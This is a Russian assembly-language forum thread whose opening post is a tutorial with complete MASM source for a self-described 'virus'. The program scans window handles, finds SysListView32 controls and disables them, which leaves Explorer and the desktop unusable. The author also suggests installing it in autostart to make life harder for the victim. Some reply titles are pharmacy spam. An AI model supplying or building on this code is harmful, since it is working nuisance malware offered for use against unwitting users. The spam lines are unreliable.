IPB
ЛогинПароль:

> ПРАВИЛА РАЗДЕЛА!!!

1. Заголовок или название темы должно быть информативным
2. Все тексты программ должны помещаться в теги [CODE=asm] [/CODE]
3. Прежде чем задавать вопрос, см. "FAQ",если там не нашли ответа, воспользуйтесь ПОИСКОМ, возможно, такую задачу уже решали!
4. Не предлагайте свои решения на других языках, кроме Ассемблера. Исключение только с согласия модератора.
5. НЕ используйте форум для личного общения! Все, что не относиться к обсуждению темы - на PM!
6. Проверяйте программы перед тем, как выложить их на форум!!

> Написание простейшего вируса на ассемблере, Не кому не читать!!!
сообщение
Сообщение #1


Пионер
**

Группа: Пользователи
Сообщений: 69
Пол: Мужской
Реальное имя: Вася Пупкин

Репутация: -  1  +


От нечего делать решил написать про вирусы! Вот она наболевшая проблема компьютеров! Вирус будет существовать всегда, т.к. желающих портить и ломать софт всегда хватало. Подозреваю что и Ты решил написать что-нибудь подобное(иначе зачем это читать?). Итак кончаем трепаться и перейдем к делу(круто звучит?): писать вирус мы будем на ассемблере, поэтому любители всяких "Дельфи" просьба удалиться, зрелище не для слабонервных(так многим кажется)! Что нам потребуется? Минимально нам потребуется компилятор ассемблера, компоновщик и любой текстовый редактор. Неплохо было бы иметь под рукой отладчик (я использую OllyDbg v1.09) Я рекомендую использовать для компиляции пакет MASM. Он лучше всего подходит для создания Windows приложений. Итак когда все есть можно приступить к делу.
    Для данного вируса мне потребуется всего три стандартных функции Win32: ExitProcess из kernel32.dll и EnableWindow и GetClassNameA из user32.dll.    Нужно обьявить их в коде:

includelib \masm32\lib\kernel32.lib
extrn__imp__ExitProcess@4:dword
ExitProcessequ __imp__ExitProcess@4
includelib \masm32\lib\user32.lib
extrn__imp__EnableWindow@8:dword
extrn__imp__GetClassNameA@12:dword
EnableWindowequ __imp__EnableWindow@8
GetClassNameequ __imp__GetClassNameA@12



   Теперь, когда обьявлены экспортируемые функции, можно перейти к сегменту данных. В сегменте данных мне понадобится 4 байта. В этой памяти мы будем хранить первые 4 байта из названия класса.
.386
.model flat
.data
buffer db 4 dup (?)

   Перейдем непосредственно к реализации кода. В регистре esi с самого начала программы я буду хранить числа от 0 до 100000. Зачем это нужно? Я в кратце попытаюсь объяснить мой алгоритм:
    У каждого элемента управления Windows есть хендл (по-русски дескриптор). Он уникален и не может повторятся, этим мы и воспользуемся. Из своих наблюдений и опыта я заметил, что ОС Windows присваивает элементам управления(Button, ListBox, Edit...) дескрипторы от 0 и выше. Все зависит от количества открытых приложений, и от количества элементов управления в них. Думаю что в среднем открытых хендлов в системе имеется не более 20000, но мы перестрахуемся и переберем первые 100000. Благодаря быстродействию современных компьютеров можно было бы проверить все возможные хендлы в системе, а это довольно много(от 0 до 0FFFFFFFFh), но мы этого делать не будем. Как я указал ранее хранить дескрипторы будем на регистре esi, и будем проверять каждый с помощью функции Windows GetClassNameA на имя искомого класса, зарание нами указанного(в моем примере это SysListView32, но при желании можно поискать кнопки и т.д.). Думаю нужно рассказать как работает GetClassNameA.
    Вот как выглядит описание этой функции на сайте MSDN:
int GetClassName(
   HWND   hWnd,
   LPTSTR lpClassName,
   int    nMaxCount
);
hWnd - Дескриптор, класс которого нужно узнать.
lpClassName - Указатель на строку, в которую функция запишет имя класса.
nMaxCount - Сколько символов нужно записать в вышеуказанную строку.

   Возвращаемое значение: Количество скопированых байт в успешном случае, или 0 при ошибке. Подробнее об ошибке можно узнать вызвав GetLastError.
   Далее если функция GetClassNameA не дала в результате 0, то мы проверяем является ли класс, находящийся в buffer именно SysListView32. Если мы нашли искомый класс, то можно сделать юзеру пакость. Имея нужный нам хендл (на esi) наши возможности по управлению им (классом) становятся практически неограниченными. Здесь наши пути могут разойтись. Если цель данного вируса - простая шутка, то можно, скажем изменить надпись на элементе управления (если сканировать будете на Button...) или добавить пару пунктов в SysListView32 или переместить объект по окну или... Еще раз повторю: наши возможности практически неограничены! Все зависит от вашей фантазии. Лично я в этом примере поступлю так: если нахожу SysListView32, то делаю его недоступным, а если не нахожу, то перехожу к следующему хендлу и т.д. Надеюсь до этого все понятно, идем дальше. Сегмент кода:
.code
_start:
xor esi, esi    ; В esi 0
mov ebx, 100000 ; В ebx 100000
lea edi, buffer

   Далее идет главный участок программы, это цикл, который должен повториться 100000 раз. Почему именно 100000 раз? - Смотрите выше.


repeat_this:
; Увеличиваем esi на 1, тем
; самым перейдя на следующий возможный хендл
inc esi

   Затем, теоретически имея на esi хендл мы проверим, является ли данное число искомым классом. Воспользуемся функцией Api GetClassNameA. В результате при удачном выполнении мы получим имя класса в массиве buffer, а если что-то не так, то в результате GetClassName выдаст нам 0.
push5      ; Сколько байт записывать
push edi; Куда их записывать
push esi
callGetClassName
; Если GetClassName не дал результатов, то идем ниже
test eax, eax

jz@1

   Теперь время фишки: я записую в массив только 4 байта из названия класса. Во-первых так мы добьемся более высокой скорости выполнения, во-вторых я не припоминаю стандартных классов Windows начинающихся с "SysL" кроме SysListView32.

cmp dword ptr [edi], 'LsyS'
jne @1

   Круто! Есть первый кандидат на "затемнение". Чтобы сделать SysListView32 заблокированным вызовем стандартную функцию EnableWindow. По традиции заглянем в MSDN:
BOOL EnableWindow (
       HWND   hWnd,
       BOOL   Enable
      );
hWnd - Блокиpуемое или pазблокиpуемое окно.
Enable - TRUE, для разблокирования. FALSE, для блокировки.

Возвpащаемое значение:
Не нуль - в случае успешного завеpшения. 0 - в пpотивном случае.

push FALSE    ; Не активный
push esi         ; хендл SysListView32
call EnableWindow
@1:
; Устанавливает Zero-флаг в 1, если источник=0
dec ebx
; Если не 0, то переходим на новый поиск
jnzrepeat_this
Когда сделали жизнь юзеру хуже, закрываемся и уходим!

push ebx               ; ebx=0
call ExitProcess
end _start

   Конечно работать без проводника и рабочего стола юзеру будет тяжело smile.gif. Но еще более осложнить ему жизнь можно поместив нашу програмку в автозагрузку, будет весело! Но уж это сами! Я ни какой ответственности не несу. И вообще я компьютеров побаиваюсь smile.gif

Сообщение отредактировано: volvo -


--------------------
Стабильность - признак мастерства
 Оффлайн  Профиль  PM 
 К началу страницы 
+ Ответить 

Сообщений в этой теме
gMan   Написание простейшего вируса на ассемблере   29.07.2004 21:52
APAL   ИМХО: Dark, Shadow - я бы рейтинг ему поднял... за…   29.07.2004 22:58
Shadow   TheLizard :D весьма забавно продолжай в том же …   30.07.2004 1:10
gMan   :) Очень приятно. Ждите, может ещё что нибудь вы…   30.07.2004 14:34
BlackShadow   Так держать :)   31.07.2004 3:05
GLuk   Может быть лучше написать антивирус? Всяко полезне…   4.08.2004 2:59
gMan   А может ты напишешь? Или вместе? :) Вообще идей …   4.08.2004 5:10
GLuk   Давай вместе, я давно уж хотел это сделать, то что…   4.08.2004 10:45
BlackShadow   TheLizard, не повезло тебе. Я ещё не отошёл от пья…   4.08.2004 17:30
FreeMan   BlackShadow прав. Только и на троян это мало похож…   4.08.2004 19:30
BlackShadow   FreeMan, ты про вариант с прыжками в кернел и т. д…   4.08.2004 19:39
FreeMan   BlackShadow, оно очень даже страшненько. Словить н…   4.08.2004 20:14
gMan   :( Пойду напьюсь.   5.08.2004 0:04
FreeMan   TheLizard, лучше скачай и почитай 29А :D   5.08.2004 14:14
APAL   TheLizard И убиваться (читай упиваться) по этом п…   5.08.2004 14:30
gMan   Нет проблем. Приму критику к сведению, но про анти…   5.08.2004 15:18
BlackShadow   Хреново дело...   5.08.2004 16:05
gMan   Очень хреново... Седня последний день! :(   6.08.2004 15:38
when is generic viagra going to   Generic Viagra X Mg   19.12.2021 2:56
BlackShadow   Ну вот, ещё одна извилина попала под статью …   6.08.2004 16:03
Dark   А продолжение будет??? :D   8.10.2004 18:24
gMan   А надо?   9.10.2004 14:56
Dark   Честно говоря - да =) Тем более раз начал...   10.10.2004 3:49
FreeMan   Блин. Заодно и вопрос - как знатоку. Вот размещаю …   18.10.2004 19:10
BlackShadow   :) В Win32 сегмент кода как правило ReadOnly-Memor…   19.10.2004 1:35
FreeMan   Поэтому приходиться ручками фиксить заголовок, что…   21.10.2004 17:26
buy hydroxychloroquine over the   Levitra Patente   8.12.2021 0:48


 Ответить  Открыть новую тему 
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 





- Текстовая версия 29.03.2024 19:57
500Gb HDD, 6Gb RAM, 2 Cores, 7 EUR в месяц — такие хостинги правда бывают
Связь с администрацией: bu_gen в домене octagram.name